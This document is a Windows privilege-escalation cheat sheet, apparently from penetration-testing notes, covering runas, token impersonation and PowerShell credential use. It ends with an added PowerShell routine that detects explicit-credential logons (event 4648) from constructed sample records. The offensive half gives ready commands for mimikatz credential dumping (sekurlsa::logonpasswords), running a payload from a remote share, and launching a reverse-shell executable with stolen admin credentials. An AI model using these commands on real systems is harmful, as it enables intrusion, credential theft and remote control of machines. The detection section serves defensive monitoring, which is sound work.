Impersonation and Tokens

Run as

runas /u:<user> cmd.exe
runas /netonly /user:<dom>\<user> cmd.exe
runas /noprofile /user:<dom>\<user> cmd.exe
runas /profile /env /user:<domain>\<user> <"%windir%\system32\script.bat">
Info: the following command should work in a Citrix session with published applications. A GUI is needed to fill in the credentials.

Start-Process Powershell -Verb RunAs

Tokens

load incognito
list_tokens -u
list_tokens -g
impersonate_token <toto.in>\\<Administrator> (escape '\')
mimikatz token::elevate /system
mimikatz !token::whoami
mimikatz !sekurlsa::logonpasswords
mimikatz !token::run "\\<remote_share>\<share>\<payload.exe>"

Windows sudo with PowerShell

$pw = ConvertTo-SecureString "EnterPasswordHere" -AsPlainText -Force
$pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "EnterDomainName\EnterUserName", $pw
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
# Double quotes so $script expands in the outer shell; the inner process has no such variable
Start-Process powershell -Credential $pp -ArgumentList "-noprofile -command &{Start-Process '$script' -Verb RunAs}"

$secpasswd = ConvertTo-SecureString "<admin_pass_clear_text>" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("<Admin_username>", $secpasswd)
$computer = "<COMPUTER_NAME>"
# Overload: Start(fileName, arguments, userName, password, domain)
[System.Diagnostics.Process]::Start("<C:/users/public/reverse_shell.exe>", "", $mycreds.UserName, $mycreds.Password, $computer)

powershell -ExecutionPolicy Bypass -File sudo.ps1
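Every runas and Start-Process -Credential invocation on this page writes Security event 4648 (a logon was attempted using explicit credentials) on the host it runs on. As an added example, not part of the original page, the PowerShell below parses 4648 records into a triage table and flags logons to accounts on an assumed watch list; the two event records are constructed samples, not real log data.

```powershell
# Added example (not from the original page): triage Security event 4648,
# which runas.exe and Start-Process -Credential both generate.

function Get-ExplicitLogon {
    param(
        [Parameter(Mandatory)] [xml]$EventXml,
        [string[]]$WatchAccounts = @('Administrator')   # assumed watch list
    )
    # Each <Data Name="..."> element of the record becomes a key in $d
    $d = @{}
    foreach ($n in $EventXml.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [pscustomobject]@{
        Time    = $EventXml.Event.System.TimeCreated.SystemTime
        Subject = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
        Target  = "$($d.TargetDomainName)\$($d.TargetUserName)"
        Process = $d.ProcessName
        Suspect = ($WatchAccounts -contains $d.TargetUserName)
    }
}

# Constructed sample records in the 4648 schema (not real log data)
$sample1 = @'
<Event><System><EventID>4648</EventID><TimeCreated SystemTime="2024-01-01T10:00:00Z"/></System>
<EventData><Data Name="SubjectUserName">alice</Data><Data Name="SubjectDomainName">CORP</Data>
<Data Name="TargetUserName">Administrator</Data><Data Name="TargetDomainName">CORP</Data>
<Data Name="ProcessName">C:\Windows\System32\runas.exe</Data></EventData></Event>
'@
$sample2 = @'
<Event><System><EventID>4648</EventID><TimeCreated SystemTime="2024-01-01T10:05:00Z"/></System>
<EventData><Data Name="SubjectUserName">svc_backup</Data><Data Name="SubjectDomainName">CORP</Data>
<Data Name="TargetUserName">svc_backup</Data><Data Name="TargetDomainName">CORP</Data>
<Data Name="ProcessName">C:\Windows\System32\svchost.exe</Data></EventData></Event>
'@

$sample1, $sample2 | ForEach-Object { Get-ExplicitLogon -EventXml $_ } | Format-Table -AutoSize

# Live use on a host (needs rights to read the Security log):
# Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4648} |
#     ForEach-Object { Get-ExplicitLogon -EventXml $_.ToXml() }
```

The first sample is flagged (runas.exe to Administrator), the second is not; widen the watch list to the privileged accounts of your own environment.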